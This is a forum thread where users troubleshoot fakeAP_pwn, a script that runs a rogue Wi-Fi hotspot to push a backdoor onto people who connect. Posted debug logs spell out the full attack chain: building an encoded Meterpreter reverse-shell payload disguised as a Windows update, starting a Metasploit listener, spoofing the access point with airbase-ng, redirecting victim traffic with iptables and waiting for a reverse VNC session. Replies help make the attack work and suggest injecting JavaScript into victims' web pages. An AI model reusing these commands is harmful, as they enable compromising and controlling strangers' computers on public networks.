[Script] [Video] fakeAP_pwn (v0.3)

Quote:

---

Originally Posted by Jaylong

i get new version from this site #127,yesterday it worked well ,it is amazing ...;)but today i use it again but

Code:

---

[>] Analyzing: Environment # here is stuck long time then
[!] Internet access: Failed
[i] Switching mode: non
[>] Configuring: Environment

---

i have no idea about this ,yesterday it worked ,

---

enable debug mode and try running it again

Quote:

---

Originally Posted by joker5bb

enable debug mode and try running it again

---

thanks for your suggestion,here is still the same problem,

Code:

---

[*] fakeAP_pwn v0.3 (#127)
display~info Debug mode
[i] Debug mode
display~action Analyzing: Environment
[>] Analyzing: Environment
display~diag Testing: Internet connection
[+] Testing: Internet connection
display~error Internet access: Failed
[!] Internet access: Failed
display~info Switching mode: non
[i] Switching mode: non
display~info        interface=eth0
[i]    wifiInterface=wlan0
[i]      apInterface=at0
[i]            essid=ChinaNet-Free
[i]          channel=1
[i]          apType=airbase-ng
[i]            mode=non
[i]          payload=vnc
[i]    backdoorPath=/root/backdoor.exe
[i]              www=/var/www/fakeAP_pwn
[i]      respond2All=false
[i]          macMode=set
[i]          fakeMac=00:05:7c:9a:58:3f
[i]          extras=false
[i]      mtuMonitor=1800
[i]            mtuAP=1400
[i]      diagnostics=false
[i]          verbose=1
[i]            debug=true
[i]          gateway=
[i]            ourIP=10.0.0.1
[i]            port=14267
[i]      wifiDriver=iwlagn
[i]        interface=eth0
[i]    wifiInterface=wlan0
[i]      apInterface=at0
[i]            essid=ChinaNet-Free
[i]          channel=1
[i]          apType=airbase-ng
[i]            mode=non
[i]          payload=vnc
[i]    backdoorPath=/root/backdoor.exe
[i]              www=/var/www/fakeAP_pwn
[i]      respond2All=false
[i]          macMode=set
[i]          fakeMac=00:05:7c:9a:58:3f
[i]          extras=false
[i]      mtuMonitor=1800
[i]            mtuAP=1400
[i]      diagnostics=false
[i]          verbose=1
[i]            debug=true
[i]          gateway=
[i]            ourIP=10.0.0.1
[i]            port=14267
[i]      wifiDriver=iwlagn
display~action Configuring: Environment
[>] Configuring: Environment
cleanUp~remove
display~action Removing: Temp files
[>] Removing: Temp files
action~Removing temp files rm -rfv /root/fakeAP_pwn/tmp
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Removing temp files" -e "rm -rfv /root/fakeAP_pwn/tmp"
display~action Stopping: Daemons & Programs
[>] Stopping: Daemons & Programs
action~Stopping  killall airbase-ng hostapd xterm dhcpcd dnsmasq sbd vnc apache2 ; /etc/init.d/dhcp3-server stop ; /etc/init.d/apparmor stop ; /etc/init.d/dnsmasq stop ; /etc/init.d/apache2 stop
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Stopping" -e " killall airbase-ng hostapd xterm dhcpcd dnsmasq sbd vnc apache2 ; /etc/init.d/dhcp3-server stop ; /etc/init.d/apparmor stop ; /etc/init.d/dnsmasq stop ; /etc/init.d/apache2 stop"
action~Refreshing wlan0 ifconfig wlan0 down && ifconfig wlan0 up && sleep 1
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Refreshing wlan0" -e "ifconfig wlan0 down && ifconfig wlan0 up && sleep 1"
display~action Configuring: Wireless card
[>] Configuring: Wireless card
action~Monitor Mode (Starting) airmon-ng start wlan0
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Monitor Mode (Starting)" -e "airmon-ng start wlan0"
display~info monitorInterface=mon0
[i] monitorInterface=mon0
action~MTU ifconfig "mon0" mtu "1800"
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - MTU" -e "ifconfig "mon0" mtu "1800""
display~action Configuring: MAC address
[>] Configuring: MAC address
action~Configuring MAC ifconfig mon0 down ; macchanger -m 00:05:7c:9a:58:3f mon0 ; ifconfig mon0 up
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Configuring MAC" -e "ifconfig mon0 down ; macchanger -m 00:05:7c:9a:58:3f mon0 ; ifconfig mon0 up"
display~info mac=00:05:7c:9a:58:3f (Rco Security Ab)
[i] mac=00:05:7c:9a:58:3f (Rco Security Ab)
display~action Creating: Scripts
[>] Creating: Scripts
#....here is too much code
display~action Creating: Exploit (Windows)
[>] Creating: Exploit (Windows)
action~Metasploit (Windows) /opt/metasploit3/bin/msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 R | /opt/metasploit3/bin/msfencode -x /var/www/fakeAP_pwn/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/fakeAP_pwn/Windows-KB183905-x86-ENU.exe
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Metasploit (Windows)" -e "/opt/metasploit3/bin/msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 R | /opt/metasploit3/bin/msfencode -x /var/www/fakeAP_pwn/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/fakeAP_pwn/Windows-KB183905-x86-ENU.exe"
display~action Creating: Access point
[>] Creating: Access point
action~Access Point killall airbase-ng ; sleep 1 ; airbase-ng -a 00:05:7c:9a:58:3f -W 0 -c 1 -e "ChinaNet-Free" -v mon0 true 0|0|4
xterm -geometry 84x4+0+0 -T "fakeAP_pwn v0.3 (#127) - Access Point" -e "killall airbase-ng ; sleep 1 ; airbase-ng -a 00:05:7c:9a:58:3f -W 0 -c 1 -e "ChinaNet-Free" -v mon0"
display~action Configuring: Network
[>] Configuring: Network
action~Setting up at0 ifconfig lo up ;
ifconfig at0 10.0.0.1 netmask 255.255.255.0 ;
ifconfig at0 mtu 1400 ;
ifconfig mon0 mtu 1800 ;
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 at0 ;
echo "1" > /proc/sys/net/ipv4/ip_forward
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Setting up at0" -e "ifconfig lo up ;
ifconfig at0 10.0.0.1 netmask 255.255.255.0 ;
ifconfig at0 mtu 1400 ;
ifconfig mon0 mtu 1800 ;
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 at0 ;
echo "1" > /proc/sys/net/ipv4/ip_forward"
ipTables~clear
action~iptables iptables -F ; iptables -X ; iptables -t filter -F ; iptables -t filter -X ; iptables -t filter -Z ; iptables -t nat -F ; iptables -t nat -X ; iptables -t nat -Z ; iptables -t mangle -F ; iptables -t mangle -X ; iptables -t mangle -Z
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - iptables" -e "iptables -F ; iptables -X ; iptables -t filter -F ; iptables -t filter -X ; iptables -t filter -Z ; iptables -t nat -F ; iptables -t nat -X ; iptables -t nat -Z ; iptables -t mangle -F ; iptables -t mangle -X ; iptables -t mangle -Z"
ipTables~force at0
action~iptables iptables --table nat --append PREROUTING --in-interface at0 --proto tcp --jump DNAT --to 10.0.0.1 ;
      iptables --table nat --append PREROUTING --in-interface at0 --jump REDIRECT ;
      iptables --table nat --append PREROUTING --in-interface at0 -m limit --liit 1/second --jump LOG --log-prefix "fakeAP_pwn (PREROUTING): " --log-level 7
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - iptables" -e "iptables --table nat --append PREROUTING --in-interface at0 --proto tcp --jump DNAT --to 10.0.0.1 ;
      iptables --table nat --append PREROUTING --in-interface at0 --jump REDIRECT ;
      iptables --table nat --append PREROUTING --in-interface at0 -m limit --liit 1/second --jump LOG --log-prefix "fakeAP_pwn (PREROUTING): " --log-level 7"
display~action Configuring: Permissions

---

Quote:

---

Originally Posted by joker5bb

enable debug mode and try running it again

---

Code:

---

[>] Configuring: Permissions
action~DHCP mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - DHCP" -e "mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd"
display~action Starting: DHCP
[>] Starting: DHCP
action~DHCP dhcpd3 -d -f -cf /root/fakeAP_pwn/tmp/fakeAP_pwn.dhcp -pf /var/run/dhcpd/dhcpd.pid at0 true 0|80|5
xterm -geometry 84x5+0+80 -T "fakeAP_pwn v0.3 (#127) - DHCP" -e "dhcpd3 -d -f -cf /root/fakeAP_pwn/tmp/fakeAP_pwn.dhcp -pf /var/run/dhcpd/dhcpd.pid at0"
display~action Starting: DNS
[>] Starting: DNS
action~DNS dnsmasq -C /root/fakeAP_pwn/tmp/fakeAP_pwn.dns
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - DNS" -e "dnsmasq -C /root/fakeAP_pwn/tmp/fakeAP_pwn.dns"
action~DNS  tail -f /root/fakeAP_pwn/tmp/fakeAP_pwn.log.dnsmasq | grep -v DHCP false 0|173|5
xterm -geometry 84x5+0+173 -T "fakeAP_pwn v0.3 (#127) - DNS" -e " tail -f /root/fakeAP_pwn/tmp/fakeAP_pwn.log.dnsmasq | grep -v DHCP"
display~action Starting: Exploit
[>] Starting: Exploit
action~Metasploit (Windows) /opt/metasploit3/bin/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 AutoRunScript=/root/fakeAP_pwn/tmp/fakeAP_pwn.rb INTERFACE=at0 E true 0|265|15
xterm -geometry 84x15+0+265 -T "fakeAP_pwn v0.3 (#127) - Metasploit (Windows)" -e "/opt/metasploit3/bin/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 AutoRunScript=/root/fakeAP_pwn/tmp/fakeAP_pwn.rb INTERFACE=at0 E"
display~action Starting: Web server
[>] Starting: Web server
action~Web Sever /etc/init.d/apache2 start && ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeAP_pwn && a2enmod ssl && a2enmod php5 && /etc/init.d/apache2 reload
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Web Sever" -e "/etc/init.d/apache2 start && ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeAP_pwn && a2enmod ssl && a2enmod php5 && /etc/init.d/apache2 reload"
display~action Monitoring: Connections
[>] Monitoring: Connections
display~action Starting: VNC
[>] Starting: VNC
display~info Waiting for the target to run the "update" file
[i] Waiting for the target to run the "update" file
action~VNC vncviewer -listen -encodings Tight -noraiseonbeep -bgr233 -compresslevel 7 -quality 0 true 0|580|3
action~Connections watch -d -n 1 "arp -n -v -i at0" false 0|487|5
xterm -geometry 84x3+0+580 -T "fakeAP_pwn v0.3 (#127) - VNC" -e "vncviewer -listen -encodings Tight -noraiseonbeep -bgr233 -compresslevel 7 -quality 0"
xterm -geometry 84x5+0+487 -T "fakeAP_pwn v0.3 (#127) - Connections" -e "watch -d -n 1 "arp -n -v -i at0""
^CcleanUp~interrupt

display~info *** BREAK ***
[i] *** BREAK ***
action~Killing xterm killall xterm
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Killing xterm" -e "killall xterm"
display~action Restoring: Environment
[>] Restoring: Environment
display~action Restoring: Programs
[>] Restoring: Programs
action~Monitor Mode (Stopping) airmon-ng stop mon0
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Monitor Mode (Stopping)" -e "airmon-ng stop mon0"
action~Stopping/Starting /etc/init.d/squid stop ; /etc/init.d/apache2 stop ; /etc/init.d/dnsmasq stop ; /etc/init.d/wicd start ; service network-manager start
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Stopping/Starting" -e "/etc/init.d/squid stop ; /etc/init.d/apache2 stop ; /etc/init.d/dnsmasq stop ; /etc/init.d/wicd start ; service network-manager start"
display~action Restoring: Network
[>] Restoring: Network
action~Restoring: Network  echo "0" > /proc/sys/net/ipv4/ip_forward
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Restoring: Network" -e " echo "0" > /proc/sys/net/ipv4/ip_forward"
action~ipTables cat /var/log/kern.log | grep fakeAP_pwn > /root/fakeAP_pwn/tmp/fakeAP_pwn.log.iptables
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - ipTables" -e "cat /var/log/kern.log | grep fakeAP_pwn > /root/fakeAP_pwn/tmp/fakeAP_pwn.log.iptables"
ipTables~clear
action~iptables iptables -F ; iptables -X ; iptables -t filter -F ; iptables -t filter -X ; iptables -t filter -Z ; iptables -t nat -F ; iptables -t nat -X ; iptables -t nat -Z ; iptables -t mangle -F ; iptables -t mangle -X ; iptables -t mangle -Z
xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - iptables" -e "iptables -F ; iptables -X ; iptables -t filter -F ; iptables -t filter -X ; iptables -t filter -Z ; iptables -t nat -F ; iptables -t nat -X ; iptables -t nat -Z ; iptables -t mangle -F ; iptables -t mangle -X ; iptables -t mangle -Z"[*] Done! (=  Have you... g0tmi1k?

---

is it something wrong with iptables? do you have any idea

i have the same problem with svn 127.

with the older version:

it starts up, everything looks good, AP shows up at the client, but when i hit connet i dont get ANY ip from the fakeAP dhcp. even when i enter some valid ip by myself to the "victim" i DONT get any connection.
does anybody have at least a clue where i should look at....i dont have any ideas.

running on dell 830 + alfa usb wlan
try to connect with another dell 630, iphone, ipad, nothing.

Quote:

---

Originally Posted by MartinBishop

i have the same problem with svn 127.

with the older version:

it starts up, everything looks good, AP shows up at the client, but when i hit connet i dont get ANY ip from the fakeAP dhcp. even when i enter some valid ip by myself to the "victim" i DONT get any connection.
does anybody have at least a clue where i should look at....i dont have any ideas.

running on dell 830 + alfa usb wlan
try to connect with another dell 630, iphone, ipad, nothing.

---

Try running with hostap instead of airbase-ng

sadly my awus036h / rtl8187 chipset seems not to support hostap nor any other AP services. can somebody verify this ?

Quote:

---

Originally Posted by MartinBishop

sadly my awus036h / rtl8187 chipset seems not to support hostap nor any other AP services. can somebody verify this ?

---

check for AP mode support with "iw list"

Quote:

---

Originally Posted by joker5bb

check for AP mode support with "iw list"

---

result of iw list -> http://pastebin.com/9YE6DRYQ

fun thing is, if i fire up the script i can see the AP, i managed it to get it to work one time ( within 4-5h of trying ), maybe this was just a coincidence ?

Quote:

---

Originally Posted by joker5bb

Im testing out Coovachilli for the multiclient feature for fakeap_pwn. In vmware hostapd is too slow. I need to build a dedicated test server.

---

I would just like to point out, for best result use a "real install" - not one used in a Virtual Machine.

Looking forward to Coovachill! =D

Quote:

---

Originally Posted by studlymidget

I'm getting some weird things from this script.



Whenever it fires up, my victim box (win 7) shows every wireless ap from my bt box (btr2).



When i connect to "Free Wifi" i sometimes get nothing but an "IE Cannot Display Webpage error" or a continuous search loop.



Any ideas?



id be happy to provide more information.



Best regards ,



The Midget

---

It sounds like you’re having a DNS issue. Can you surf to 10.0.0.1? Does that work? Else are you getting a IP address?

Quote:

---

Originally Posted by pablo10590

My setup and problem



Attacker: VMWare backtrack 4 + rtl8187l + fakeAP_pwn 0.3 115

Target: Windows 7 (no antivirus/firewall etc is my own computer)



Target can find the network find, can connect fine, gets IP etc, loads up the spoof webpage, downloads the backdoor.



However that is it? Nothing else happens.



So on the attacker it's stuck at "sending stage (xxxxx bytes) to 10.0.0.151"



On the target the program is running, checked process list, but nothing is happening? Tried leaving it running for few minutes, nada, tried hostapd but that doesn't load, tried different browsers and different wireless adaptors for the ap, no diff???

---

Hmmm... How long did you have to wait for the page to load?

This has happened before...

Could you try using a different MTU value? 1400, 1500 and/or 1800?

Quote:

---

Originally Posted by leg3nd

Hey I have narrowed down this error a bit more and was curious if anyone had found a solution..



It makes sense that you would not have gotten the error in a BT4 R1 installation because it doesn't seem to be an issue in R1.



I tried these solutions and all it did was start giving me the same error, but now in terminator as well.. So I restored the backed up folders and I am back to square one.



Xterm throws out these errors all over the place while terminator has no problems.



So basically this seems to only be an issue with BT4 R2 installations, or maybe a fluxbox problem. (im not using KDE, maybe fnord0 is using fluxbox too?).



Regardless, it seems that full functionality is available in xterm, but these errors all over the place do make most my scripts a bit messy.



Any help or advice is appreciated.

---

It’s been a while since I’ve work on this project, since then I've now moved to BT4 R2. I'm planning on starting work on it again during the summer.

Thanks for reporting back with another pointer about fluxbox/KDE.

It’s a messy script, plus alot of moving parts! I'm hoping that v0.4 will be better! ;)

Quote:

---

Originally Posted by nitroglico

Very nice... I will help to enhance it and post my progress here

---

Thanks! Any feedback is welcome. =)

Quote:

---

Originally Posted by joker5bb

Today I went back to bind9, and i finally made it work properly, this method below would be the solution for dns.

For me it worked really fast with hostapd, please test it out - this is not in the scipt yet



edit /etc/bind/named.conf





edit /etc/bind/db.root





start bind9

Code:

---

/etc/init.d/bind9 start

---

next step is squid proxy - insert our own javascript in to web pages



*if hostapd does not work for you, make sure you are using mac80211-based drivers and check if it has AP mode support for your wireless card

check with "iw list"



Possible fixes:

-If it hostapd does not work correctly upgrade to latest drivers

-using fragmentation patch on mac80211 breaks hostapd

-try out the dev version of hostapd

---

Thanks for doing that! :)

I plan to automate this in the script when I've tested it.

Quote:

---

Originally Posted by Jaylong

can you tell me how can it work again,my problemi is it stuck Analyzing: Environment or Internet access: Failed

---

A few people have got this and it has been a bug in older versions. Which version are you using?

Quote:

---

Originally Posted by Jaylong

i get new version from this site #127,yesterday it worked well ,it is amazing ...;)but today i use it again but

Code:

---

[>] Analyzing: Environment # here is stuck long time then

[!] Internet access: Failed

[i] Switching mode: non

[>] Configuring: Environment

---

i have no idea about this ,yesterday it worked ,

---

Its a known issue. Ive found a better method to detect for internet access for the next release :)

Quote:

---

Originally Posted by MartinBishop

i have the same problem with svn 127.



with the older version:



it starts up, everything looks good, AP shows up at the client, but when i hit connet i dont get ANY ip from the fakeAP dhcp. even when i enter some valid ip by myself to the "victim" i DONT get any connection.

does anybody have at least a clue where i should look at....i dont have any ideas.



running on dell 830 + alfa usb wlan

try to connect with another dell 630, iphone, ipad, nothing.

---

Are you using airbase-ng or hostapd?

Are you running it in VM? (VirtualBox or VMware?)

Ive had this when using airbase-ng and in a VM. Sometimes it needs to be run a few times. Your best trying to connect with the dell before the mobile devices too.

Quote:

---

Are you using airbase-ng or hostapd?

---

iam using airbase-ng

Quote:

---

Are you running it in VM? (VirtualBox or VMware?)

---

nope, dont run any VMs. clean newest Backtrack install. victim client is a dell machine with intel wifi nics.